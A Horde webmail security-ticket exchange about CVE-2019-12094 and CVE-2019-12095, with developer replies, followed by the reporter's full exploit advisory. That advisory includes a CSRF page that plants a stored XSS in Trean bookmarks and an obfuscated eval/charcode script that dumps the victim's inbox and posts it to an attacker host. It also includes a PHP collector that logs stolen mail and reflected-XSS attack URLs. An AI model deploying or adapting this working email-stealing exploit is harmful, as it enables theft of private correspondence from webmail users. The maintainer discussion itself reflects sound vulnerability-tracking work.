Thanks for the follow-up.  I also asked MITRE and they offered the 
following clarification:
The CVE database entries have been updated as to be more clear.

As far as I know those are the only two issues applicable to this 
ticket. I think the third was the "exploit" of being able to obtain 
IMAP messages via GET requests, from a webmail application...

The original report included the following:
I am working on updating the Horde packages in Debian LTS, also 
coordinating with the security team for an update to Debian stable, 
and so some clarification would help.

It is clear that the TagCloud XSS (CVE-2019-12094) was fixed and the 
associated commit was easy to find and applied cleanly to the Horde 
package in Debian.  It is also clear that the CSRF (CVE-2019-12095) 
has been deemed minor and not worth fixing.  However, it is not clear 
that the "3 different reflected XSS vulnerability" have been 
addressed.  Is there an additional vulnerability there beyond those 
two which received CVE assignments?  Answering this would help ensure 
that we properly track the state of Horde in Debian.

For the record:
* The XSS in the Horde tag cloud widget had already been discovered, 
fixed, and released by ourselves with Horde 5.2.21 on April 21, before 
the report: https://lists.horde.org/archives/announce/2019/001278.html 
Without this, the whole "attack" is not exploitable.
* Adding bookmarks in Trean is indeed not CSRF protected, but that's 
low priority for us, because it's a non-destructive action.
* GETting IMAP messages from IMP is a core functionality of the 
webmail client and is hardly to be called a vulnerability. Whether it 
would make sense to token-protected such requests is at least debatable.
* The reporter irresponsibly disclosed his findings, because we were 
not willing, nor able to pay him a bounty price upfront.

Also for the records, these finding have been assigned CVE 2019-12094 
& CVE-2019-12095.

Conclusion: no Horde installation installed or updated since April 
21st 2019 is vulnerable to this exploit.

Download materials: https://numanozdemir.com/respdisc/horde/materials.zip

And, CVE numbers: CVE-2019-12094 and CVE-2019-12095.

# Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
# Date: 14.04.2019
# Author: InfinitumIT
# Vendor Homepage: https://www.horde.org/
# Version: Up to v5.2.22.
# info@infinitumit.com.tr && infinitumit.com.tr
# PoC: https://numanozdemir.com/respdisc/horde/horde.mp4

# Description:
# Attacker can combine "CSRF vulnerability in Trean Bookmarks 
(defaultly installed on Horde Groupware)" and
# "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" 
vulnerabilities to steal victim's emails.

# Also:
# Attacker can use 3 different reflected XSS vulnerability to exploit 
Remote Command Execution, SQL Injection and Code Execution.
# To steal e-mails, attacker will send an e-mail to victim and victim 
will click the attacker's website. So, victim's inbox will be dumped 
in attacker's FTP.
# All of them vulnerabillities are valid for all Horde Webmail versions.

# Attacker will exploit the CSRF and XSS with: index.html
# Attacker will steal and post the emails with: stealer.js
# Attacker will save the emails with: stealer.php

# index.html Codes:
<!--a75c305b1c0a6022--><script>
var url = "http://webmail.victimserver.com/trean/";
var params = 
'iframe=0&popup=0&newFolder=&actionID=add_bookmark&url=http%3A%2F%2Ftest.com&title=vulnerability&description=vulnerability&treanBookmarkTags=%22%3E%3Cscript%2Fsrc%3D%22http%3A%2F%2Fyourwebsite.com%2Fhorde%2Fstealer.js%22%3E%3C%2Fscript%3E';
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
</script>
<embed/src="http://webmail.victimserver.com/services/portal/"/height="1"/width="1">


# stealer.js Codes:
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105,11
1,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,116,1
01,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121))
// It is charcoded, firstly decode and edit for yourself then encode 
again. Also dont forget to remove spaces!


# stealer.php Codes:
<?php


header('Access-Control-Allow-Origin: *');

header('Access-Control-Allow-Headers: *');

if($_POST['inbox']){

$logs = fopen("inbox.txt", "a+");

$data = $_POST['inbox']." 
----------------------------------------------------------------- 
".chr(13).chr(10).chr(13).chr(10);
fwrite($logs, $data);

}


?>

# 
_____________________________________________________________________________________________________

# Reflected XSS to Remote Command Execution, Remote Code Execution and 
SQL Injection


http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
http://webmailvictimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f
http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE

# Attacker can execute commands & PHP codes remotely and inject 
harmful SQL queries. Also, attacker can create users too with those 
reflected XSS vulnerabilities.

# Stay Secure with InfinitumIT - infinitumit.com.tr